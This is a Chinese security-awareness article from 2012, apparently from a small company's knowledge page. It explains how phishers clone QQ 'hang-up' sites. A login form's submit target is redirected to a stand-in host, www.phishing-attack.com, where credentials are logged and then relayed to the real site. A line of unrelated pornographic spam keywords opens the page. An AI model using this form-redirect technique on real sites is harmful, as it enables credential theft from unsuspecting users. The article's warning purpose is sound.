人妻去按摩店被黑人按中出,欧美牲交videossexeso,国产XXXXXXXBB18

QQ 咨詢：361652718 513960520

知識學堂

·聯(lián)系電話:+86.023-75585550
·聯(lián)系傳真:+86.023-75585550
·24小時手機:13896886023
·QQ 咨詢：361652718 513960520

當前位置 > 首頁 > 知識學堂 > 常見技術(shù)問題

酉陽網(wǎng)盾科技為您解密黑客是怎樣偽造QQ掛機平臺盜密碼的

更新時間：2012-03-18 | 發(fā)布人：本站 | 點擊率：675 次

不知道從什么時候開始網(wǎng)絡上就開始興起了掛QQ 的風潮,誰都為了騰訊所謂的等級在不斷的掛Q 掛Q,就連掛著QQ 拿個等級有啥作用也不知道的人,看著別人有自己沒有就感覺特不爽,所以慢慢的掛Q成為了一種時尚,也成為了一種新的業(yè)務.網(wǎng)上各種各類的掛QQ網(wǎng)站層出不窮,而且沒有絲毫的減少,但是有沒有人去懷疑你所使用的掛QQ 網(wǎng)站是不是真的安全了?
為了保護作者以及雜志社本身請大家看完”免責聲明”后方可閱讀.
免責聲明：
　作者無法鑒別判斷讀者閱讀本文后的用途，如果讀者在閱讀本文后違反國家法律規(guī)定而出現(xiàn)的糾紛與及不良結(jié)果，由行為人獨立承擔所有責任，本文的作者以及刊登該文章的雜志社均不負責也不承擔任何法律責任。
　現(xiàn)在盜取任何聊天軟件的號碼,不外乎就是利用盜號軟件以及鍵盤記錄軟件記錄被種植主機的賬號以及密碼,這種累贅而又需要多方軟件支持的手法已經(jīng)過時了,而現(xiàn)在行之有效的就是利用無污染(不需要軟件以及任何病毒)去進行的盜取賬號密碼的網(wǎng)絡釣魚攻擊,網(wǎng)絡釣魚已經(jīng)變成了黑客以及一些不法分子用來進行銀行賬號以及等等相關敏感信息盜取的最有效最快速的途徑,而我們也可以利用網(wǎng)絡釣魚在一夜之間擁有成千上萬的QQ 號以及密碼(甚至于QQ 密保信息).首先釣魚者本身是會仿冒一個掛QQ 的網(wǎng)站頁面,因為要致使訪問者可以相信,所以在仿冒會根據(jù)時下最多人訪問的掛QQ 網(wǎng)站進行設計(如圖1.)
　仿冒好一個虛假的網(wǎng)站之后,釣魚者本身會想辦法如何去保存所釣到的資料,通常在釣魚網(wǎng)站中都會采取本地記錄相關資料,但是整個用戶的使用流程就會在輸入賬號以及密碼后出現(xiàn)問題,就是說釣魚者自身會想個借口出來說:”該系統(tǒng)因系統(tǒng)繁忙,暫時無法為你服務!”等等的理由,讓被釣者信服,但是現(xiàn)在作為被釣者本身已經(jīng)不再這么的愚蠢,所以傳統(tǒng)的釣魚模式已經(jīng)無法行得通.為了可以使被釣者整個使用流程不會出現(xiàn)任何的懷疑,所以釣魚者會在提交處做一定的手腳.讓我們看看例子:
}
function Login()
{window.open("about:blank","qqLogin",
"width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
o");
document.QQForm.target = "qqLogin";
document.QQForm.action = "login.asp";
document.QQForm.submit();
} 因為篇幅關系刪除多余語句
從上面的代碼我們可以看到,這是一個正常掛Q網(wǎng)站的登錄頁面代碼,當用戶訪問網(wǎng)站的時候,輸入的賬號以及密碼就會提交給login.asp 頁面,然后再轉(zhuǎn)去掛Q系統(tǒng).如果作為釣魚者本身想完美的結(jié)合真實的掛Q 網(wǎng)站去完成整個操作流程,那樣子他就必須在這個提交頁面做一些修改,使到被釣者的信息先存儲在自定的地方,然后再轉(zhuǎn)發(fā)到真實的掛Q 網(wǎng)站,所以釣魚者會有可能的把代碼提交的語句修改為:
document.QQForm.action = " 　在這里我們可以看到釣魚者把提交的數(shù)據(jù)轉(zhuǎn)發(fā)過去了 www.phishing-attack.com的網(wǎng)站,為了避免數(shù)據(jù)會被發(fā)現(xiàn),所以釣魚者利用中間站記錄用戶所提交的信息.可能大家會問到那整個釣魚過程是怎么樣的了?我給一個比較簡單的過程大家看看
　　　　釣魚網(wǎng)站--------------中間記錄站----------------真實掛Q網(wǎng)站
　當用戶訪問的時候,會將密碼提交給釣魚網(wǎng)站,釣魚網(wǎng)站會把數(shù)據(jù)轉(zhuǎn)去中間記錄站,然后在中間記錄站進行數(shù)據(jù)的保存,再次將用戶所提交的數(shù)據(jù)提交給真實的掛Q網(wǎng)站,這樣子在過程中用戶不單止可以完成整個操作的流程,并且釣魚者本身可以記錄密碼信息延長整個釣魚網(wǎng)站的生命周期(作者注:通常釣魚網(wǎng)站自身的生命周期為15 天).整個思路就是如此了,然而中間站的作用是為了保存信息以及保護信息的安全性,不必擔心當虛假網(wǎng)站被發(fā)現(xiàn)時,所保存的數(shù)據(jù)會被發(fā)現(xiàn),通常這些作為中間站的網(wǎng)站都是釣魚者的傀儡,有可能是被入侵后的,或者利用免費空間或者是只有7 天試用的測試空間作為臨時的中轉(zhuǎn).
　本文在此就把整個釣魚網(wǎng)站的過程說清楚了,因為內(nèi)容有一定的危害性,所以把中間站以及真實站之間的技術(shù)問題都屏蔽了,大家在使用掛Q網(wǎng)站的時候,請多留心注意一下掛Q網(wǎng)站的首頁源碼,看看提交處的地址和你所使用的網(wǎng)站地址是否一致,如果是一致的話,也不用這么高興,如果釣魚者本身是在本地記住你的信息,那樣子你還是一樣躲不過被釣的威脅,QQ 等級是否真的比你的號碼還重要,如果你覺得還是等級重要的話,你可以放心的去掛你的QQ,我和玄貓有一句話送給大家:”平平安安網(wǎng)站掛,哭哭啼啼QQ 丟”.請大家看清楚相關的利弊關系別麻木的去相信所謂的掛QQ 網(wǎng)站!本文到此結(jié)束

分享到：